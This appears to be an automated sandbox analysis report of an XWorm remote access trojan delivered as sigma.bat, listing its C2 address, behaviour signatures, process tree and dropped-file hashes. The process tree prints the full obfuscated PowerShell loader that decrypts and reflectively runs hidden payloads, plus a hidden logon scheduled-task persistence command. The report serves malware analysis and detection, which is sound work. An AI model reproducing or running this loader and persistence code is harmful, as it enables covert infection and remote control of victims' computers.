Analysis

  • max time kernel
    36s
  • max time network
    34s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    09-11-2024 14:32

General

  • Target

    sigma.bat

  • Size

    467KB

  • MD5

    820debc2f4f0c9222c455ad0befb35ca

  • SHA1

    2f64b6503ac7e19c37d2556c5a8096b593b152d3

  • SHA256

    722075c841ad49931e716a80a1ba276b325ee7eb7062e295140107ac73b4f9ec

  • SHA512

    c713b74b0163483a53454cfdbdf6a005950d0bf1e044698c93bfeb2e9fed2866fef0c17d5b7b6573dec062b1edcdc3e3eb8574c74a0beaeb370466d1c250d744

  • SSDEEP

    12288:vTCh8WuzcDLPRPcIA7ewthD6ERekdWYb9ACXrjuJYD5S9J:7sBut/thDZUirA2rvD49J

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:32758

pressure-continuous.gl.at.ply.gg:32758

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell and hides the display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Unexpected DNS network traffic destination 10 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses a command-line utility to view the network configuration.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sigma.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:636
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4884
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
        PID:3488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAX32kKNIA57v2PtuvPcK8ir8QplMdCOor3YMSiLeTU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wF3c9IhrNPKw6p+lQ8lg3Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KImyR=New-Object System.IO.MemoryStream(,$param_var); $RDOIU=New-Object System.IO.MemoryStream; $XQVZK=New-Object System.IO.Compression.GZipStream($KImyR, [IO.Compression.CompressionMode]::Decompress); $XQVZK.CopyTo($RDOIU); $XQVZK.Dispose(); $KImyR.Dispose(); $RDOIU.Dispose(); $RDOIU.ToArray();}function execute_function($param_var,$param2_var){ $VtPlg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DmKAS=$VtPlg.EntryPoint; $DmKAS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\sigma.bat';$GjSSJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sigma.bat').Split([Environment]::NewLine);foreach ($Rmxqb in $GjSSJ) { if ($Rmxqb.StartsWith(':: ')) { $CZpHS=$Rmxqb.Substring(3); break; }}$payloads_var=[string[]]$CZpHS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_132_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_132.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4772
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_132.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_132.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4244
          • C:\Windows\system32\net.exe
            net file
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1940
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 file
              6⤵
              PID:2112
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAX32kKNIA57v2PtuvPcK8ir8QplMdCOor3YMSiLeTU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wF3c9IhrNPKw6p+lQ8lg3Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KImyR=New-Object System.IO.MemoryStream(,$param_var); $RDOIU=New-Object System.IO.MemoryStream; $XQVZK=New-Object System.IO.Compression.GZipStream($KImyR, [IO.Compression.CompressionMode]::Decompress); $XQVZK.CopyTo($RDOIU); $XQVZK.Dispose(); $KImyR.Dispose(); $RDOIU.Dispose(); $RDOIU.ToArray();}function execute_function($param_var,$param2_var){ $VtPlg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DmKAS=$VtPlg.EntryPoint; $DmKAS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_132.bat';$GjSSJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_132.bat').Split([Environment]::NewLine);foreach ($Rmxqb in $GjSSJ) { if ($Rmxqb.StartsWith(':: ')) { $CZpHS=$Rmxqb.Substring(3); break; }}$payloads_var=[string[]]$CZpHS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3584
            • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
              "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1852
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd" /c ipconfig /all
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1624
                • C:\Windows\system32\ipconfig.exe
                  ipconfig /all
                  8⤵
                  • Gathers network information
                  PID:972
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2724
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                  8⤵
                  PID:1876
              • C:\Windows\System32\msiexec.exe
                "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
                7⤵
                PID:4976
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4872
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 00A268D38672B998D216E5CE1DB0F109
      2⤵
      • Loads dropped DLL
      PID:4936
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 96546D6DD2A48AC70B6330002FEF7725
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1284
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 1715F4B14843FCE2AB19937845DF67CE E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Windows\SysWOW64\wevtutil.exe
        "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\Windows\System32\wevtutil.exe
          "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
          4⤵
          PID:404

Network

MITRE ATT&CK Enterprise v15

Downloads

            • C:\Program Files\nodejs\node_etw_provider.man

              Filesize

              10KB

              MD5

              1d51e18a7247f47245b0751f16119498

              SHA1

              78f5d95dd07c0fcee43c6d4feab12d802d194d95

              SHA256

              1975aa34c1050b8364491394cebf6e668e2337c3107712e3eeca311262c7c46f

              SHA512

              1eccbe4ddae3d941b36616a202e5bd1b21d8e181810430a1c390513060ae9e3f12cd23f5b66ae0630fd6496b3139e2cc313381b5506465040e5a7a3543444e76

            • C:\Program Files\nodejs\node_etw_provider.man

              Filesize

              8KB

              MD5

              d3bc164e23e694c644e0b1ce3e3f9910

              SHA1

              1849f8b1326111b5d4d93febc2bafb3856e601bb

              SHA256

              1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

              SHA512

              91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

            • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

              Filesize

              818B

              MD5

              2916d8b51a5cc0a350d64389bc07aef6

              SHA1

              c9d5ac416c1dd7945651bee712dbed4d158d09e1

              SHA256

              733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

              SHA512

              508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

            • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

              Filesize

              1KB

              MD5

              5ad87d95c13094fa67f25442ff521efd

              SHA1

              01f1438a98e1b796e05a74131e6bb9d66c9e8542

              SHA256

              67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

              SHA512

              7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

            • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

              Filesize

              754B

              MD5

              d2cf52aa43e18fdc87562d4c1303f46a

              SHA1

              58fb4a65fffb438630351e7cafd322579817e5e1

              SHA256

              45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

              SHA512

              54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

            • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

              Filesize

              771B

              MD5

              e9dc66f98e5f7ff720bf603fff36ebc5

              SHA1

              f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

              SHA256

              b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

              SHA512

              8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

            • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

              Filesize

              730B

              MD5

              072ac9ab0c4667f8f876becedfe10ee0

              SHA1

              0227492dcdc7fb8de1d14f9d3421c333230cf8fe

              SHA256

              2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

              SHA512

              f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

            • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

              Filesize

              1KB

              MD5

              d116a360376e31950428ed26eae9ffd4

              SHA1

              192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

              SHA256

              c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

              SHA512

              5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

            • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

              Filesize

              802B

              MD5

              d7c8fab641cd22d2cd30d2999cc77040

              SHA1

              d293601583b1454ad5415260e4378217d569538e

              SHA256

              04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

              SHA512

              278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

            • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

              Filesize

              16KB

              MD5

              bc0c0eeede037aa152345ab1f9774e92

              SHA1

              56e0f71900f0ef8294e46757ec14c0c11ed31d4e

              SHA256

              7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

              SHA512

              5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

            • C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

              Filesize

              780B

              MD5

              b020de8f88eacc104c21d6e6cacc636d

              SHA1

              20b35e641e3a5ea25f012e13d69fab37e3d68d6b

              SHA256

              3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

              SHA512

              4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

            • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

              Filesize

              763B

              MD5

              7428aa9f83c500c4a434f8848ee23851

              SHA1

              166b3e1c1b7d7cb7b070108876492529f546219f

              SHA256

              1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

              SHA512

              c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

            • C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

              Filesize

              4KB

              MD5

              f0bd53316e08991d94586331f9c11d97

              SHA1

              f5a7a6dc0da46c3e077764cfb3e928c4a75d383e

              SHA256

              dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef

              SHA512

              fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

            • C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

              Filesize

              771B

              MD5

              1d7c74bcd1904d125f6aff37749dc069

              SHA1

              21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab

              SHA256

              24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9

              SHA512

              b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              6b8559593a74eb3b15c53a9fac9a469f

              SHA1

              13af213d1417edf30c03f76f9242c1975b2e4e74

              SHA256

              e053d1faabd6b36371f452e79cf70591cf45403a671746136a87198694a8fdb9

              SHA512

              699b11eda97866809b696c96304bc218d7b72623fd537f83721f36a6c617d854fda7b6f01f7cb0bc0d55189c386e9b9fe6d111bb7c76cce492572b0a9961e974

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              ff2ebc63009127bf2c74f18dc727774e

              SHA1

              603a245252097e9b8d6823e08a76361ba94f7720

              SHA256

              5048a68ea6a51a2a93fba28d043dbcc8ae067225e4e1b9569a74caac617e9a42

              SHA512

              15b4baf594f91eba3ad7d390859140220da191bfc9de2eeeca5455a643ce5b19cd88b221e354d6a577df799564cc73285f2418108d2b850630196053ac53007b

            • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe

              Filesize

              800KB

              MD5

              2a4dcf20b82896be94eb538260c5fb93

              SHA1

              21f232c2fd8132f8677e53258562ad98b455e679

              SHA256

              ebbcb489171abfcfce56554dbaeacd22a15838391cbc7c756db02995129def5a

              SHA512

              4f1164b2312fb94b7030d6eb6aa9f3502912ffa33505f156443570fc964bfd3bb21ded3cf84092054e07346d2dce83a0907ba33f4ba39ad3fe7a78e836efe288

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhbsvfop.kdc.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

              Filesize

              30.1MB

              MD5

              0e4e9aa41d24221b29b19ba96c1a64d0

              SHA1

              231ade3d5a586c0eb4441c8dbfe9007dc26b2872

              SHA256

              5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d

              SHA512

              e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

            • C:\Users\Admin\AppData\Roaming\startup_str_132.bat

              Filesize

              467KB

              MD5

              820debc2f4f0c9222c455ad0befb35ca

              SHA1

              2f64b6503ac7e19c37d2556c5a8096b593b152d3

              SHA256

              722075c841ad49931e716a80a1ba276b325ee7eb7062e295140107ac73b4f9ec

              SHA512

              c713b74b0163483a53454cfdbdf6a005950d0bf1e044698c93bfeb2e9fed2866fef0c17d5b7b6573dec062b1edcdc3e3eb8574c74a0beaeb370466d1c250d744

            • C:\Users\Admin\AppData\Roaming\startup_str_132.vbs

              Filesize

              115B

              MD5

              d01ef686a32d9eb2653ebde3698ab3ed

              SHA1

              e5ebad50d0dbd58cfee2bd674ce0a8e735180079

              SHA256

              f97e5c1c069825a3f0462faea1cc1acdb40083ea4bf6ebd33f8dd33b5ef4048a

              SHA512

              2599ed02753bef1288834368dbcf7df1fa6eb5bd7c854e6542a27aae227679a7a9ab2f3b9245de05f0341c62bf71b7baf8292d5e9123dfd14c3047c9dfc6d0ae

            • C:\Windows\Installer\MSI16F2.tmp

              Filesize

              297KB

              MD5

              7a86ce1a899262dd3c1df656bff3fb2c

              SHA1

              33dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541

              SHA256

              b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c

              SHA512

              421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec

            • C:\Windows\Installer\MSIE43.tmp

              Filesize

              122KB

              MD5

              9fe9b0ecaea0324ad99036a91db03ebb

              SHA1

              144068c64ec06fc08eadfcca0a014a44b95bb908

              SHA256

              e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9

              SHA512

              906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

            • C:\Windows\Installer\MSIED2.tmp

              Filesize

              211KB

              MD5

              a3ae5d86ecf38db9427359ea37a5f646

              SHA1

              eb4cb5ff520717038adadcc5e1ef8f7c24b27a90

              SHA256

              c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74

              SHA512

              96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

            • memory/1852-62-0x00000278817E0000-0x00000278818AE000-memory.dmp

              Filesize

              824KB

            • memory/3048-48-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

            • memory/3048-0-0x00007FFEF62A3000-0x00007FFEF62A5000-memory.dmp

              Filesize

              8KB

            • memory/3048-14-0x000001761A5B0000-0x000001761A68C000-memory.dmp

              Filesize

              880KB

            • memory/3048-13-0x000001761A2A0000-0x000001761A2A8000-memory.dmp

              Filesize

              32KB

            • memory/3048-12-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

            • memory/3048-11-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

            • memory/3048-1-0x000001767E700000-0x000001767E722000-memory.dmp

              Filesize

              136KB

            • memory/3584-51-0x00000269FB510000-0x00000269FB52A000-memory.dmp

              Filesize

              104KB

            • memory/4772-29-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

            • memory/4772-17-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

            • memory/4772-16-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB